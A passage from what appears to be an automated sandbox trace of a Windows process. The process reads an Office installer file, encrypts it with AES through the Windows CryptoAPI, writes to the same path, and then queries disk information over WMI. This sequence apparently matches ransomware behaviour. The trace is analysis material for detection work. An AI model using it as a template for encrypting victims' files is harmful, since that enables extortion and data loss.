lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0205.145] GetFileType (hFile=0x31c) returned 0x1 [0205.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0205.145] GetFileType (hFile=0x31c) returned 0x1 [0205.145] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x2bba00 [0205.156] ReadFile (in: hFile=0x31c, lpBuffer=0xa8868d8, nNumberOfBytesToRead=0x2bba00, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0xa8868d8*, lpNumberOfBytesRead=0x6c0f4ec*=0x2bba00, lpOverlapped=0x0) returned 1 [0205.390] CloseHandle (hObject=0x31c) returned 1 [0205.390] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdfd88) returned 1 [0205.423] CryptGenRandom (in: hProv=0xbdfd88, dwLen=0x10, pbBuffer=0x3625754 | out: pbBuffer=0x3625754) returned 1 [0206.213] CryptImportKey (in: hProv=0xbdfd88, pbData=0x367e264, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f490) returned 1 [0206.213] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.213] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.214] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f650) returned 1 [0206.214] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0206.214] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x367e344*=0x1, dwFlags=0x0) returned 1 [0206.214] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x367e310, dwFlags=0x0) returned 1 [0206.222] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xaec0748*, pdwDataLen=0x6c0f4b8*=0x2bba10, dwBufLen=0x2bba10 | out: pbData=0xaec0748*, pdwDataLen=0x6c0f4b8*=0x2bba10) returned 1 [0206.298] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x367e36c*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x367e36c*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0206.300] CryptDestroyKey (hKey=0xb7f490) returned 1 [0206.300] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0206.300] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0206.300] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0206.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0206.300] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0206.309] GetFileType (hFile=0x208) returned 0x1 [0206.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0206.309] GetFileType (hFile=0x208) returned 0x1 [0206.309] WriteFile (in: hFile=0x208, lpBuffer=0x36833d8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x36833d8*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0206.310] CloseHandle (hObject=0x208) returned 1 [0206.311] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0206.311] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0206.311] CoTaskMemFree (pv=0xbed438) [0206.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0206.311] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0206.311] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0206.311] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0206.311] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.369] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x60271c0) returned 0x0 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0206.370] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x602a060) returned 0x0 [0206.370] WbemDefPath:IUnknown:Release (This=0x60271c0) returned 0x0 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x602a060) returned 0x0 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0206.370] WbemDefPath:IUnknown:AddRef (This=0x602a060) returned 0x3 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0206.370] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbdf230) returned 0x0 [0206.370] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf230, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.370] WbemDefPath:IUnknown:Release (This=0xbdf230) returned 0x3 [0206.370] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0206.370] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0206.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0206.371] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x2 [0206.371] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x1 [0206.371] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0206.371] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0206.371] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a060, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x602a060) returned 0x0 [0206.371] WbemDefPath:IUnknown:AddRef (This=0x602a060) returned 0x3 [0206.371] WbemDefPath:IUnknown:Release (This=0x602a060) returned 0x2 [0206.371] WbemDefPath:IWbemPath:SetText (This=0x602a060, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a060, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a060, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a060, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0206.371] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.371] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0206.372] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0206.372] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0206.372] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.373] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60273f0) returned 0x0 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0206.373] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6029c70) returned 0x0 [0206.373] WbemDefPath:IUnknown:Release (This=0x60273f0) returned 0x0 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6029c70) returned 0x0 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0206.373] WbemDefPath:IUnknown:AddRef (This=0x6029c70) returned 0x3 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0206.373] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbdf170) returned 0x0 [0206.373] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf170, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.374] WbemDefPath:IUnknown:Release (This=0xbdf170) returned 0x3 [0206.374] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0206.374] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0206.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0206.374] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x2 [0206.374] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x1 [0206.374] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0206.374] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0206.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029c70, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6029c70) returned 0x0 [0206.374] WbemDefPath:IUnknown:AddRef (This=0x6029c70) returned 0x3 [0206.374] WbemDefPath:IUnknown:Release (This=0x6029c70) returned 0x2 [0206.374] WbemDefPath:IWbemPath:SetText (This=0x6029c70, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.374] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0206.374] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0206.374] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.374] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0206.374] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0206.375] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0206.375] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.375] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6024ba8) returned 0x0 [0206.375] WbemLocator:IUnknown:QueryInterface (in: This=0x6024ba8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0206.375] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024ba8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027400) returned 0x0 [0206.376] WbemLocator:IUnknown:Release (This=0x6024ba8) returned 0x0 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027400) returned 0x0 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0206.376] WbemLocator:IUnknown:AddRef (This=0x6027400) returned 0x3 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0206.376] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0206.376] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0206.376] WbemLocator:IUnknown:Release (This=0x6027400) returned 0x2 [0206.376] WbemLocator:IUnknown:Release (This=0x6027400) returned 0x1 [0206.376] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0206.376] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0206.376] WbemLocator:IUnknown:QueryInterface (in: This=0x6027400, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027400) returned 0x0 [0206.376] WbemLocator:IUnknown:AddRef (This=0x6027400) returned 0x3 [0206.376] WbemLocator:IUnknown:Release (This=0x6027400) returned 0x2 [0206.377] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0206.377] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0206.377] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.377] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027410) returned 0x0 [0206.377] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027410, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6033584) returned 0x0 [0206.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5bf44) returned 0x0 [0206.515] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bf44, pProxy=0x6033584, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, 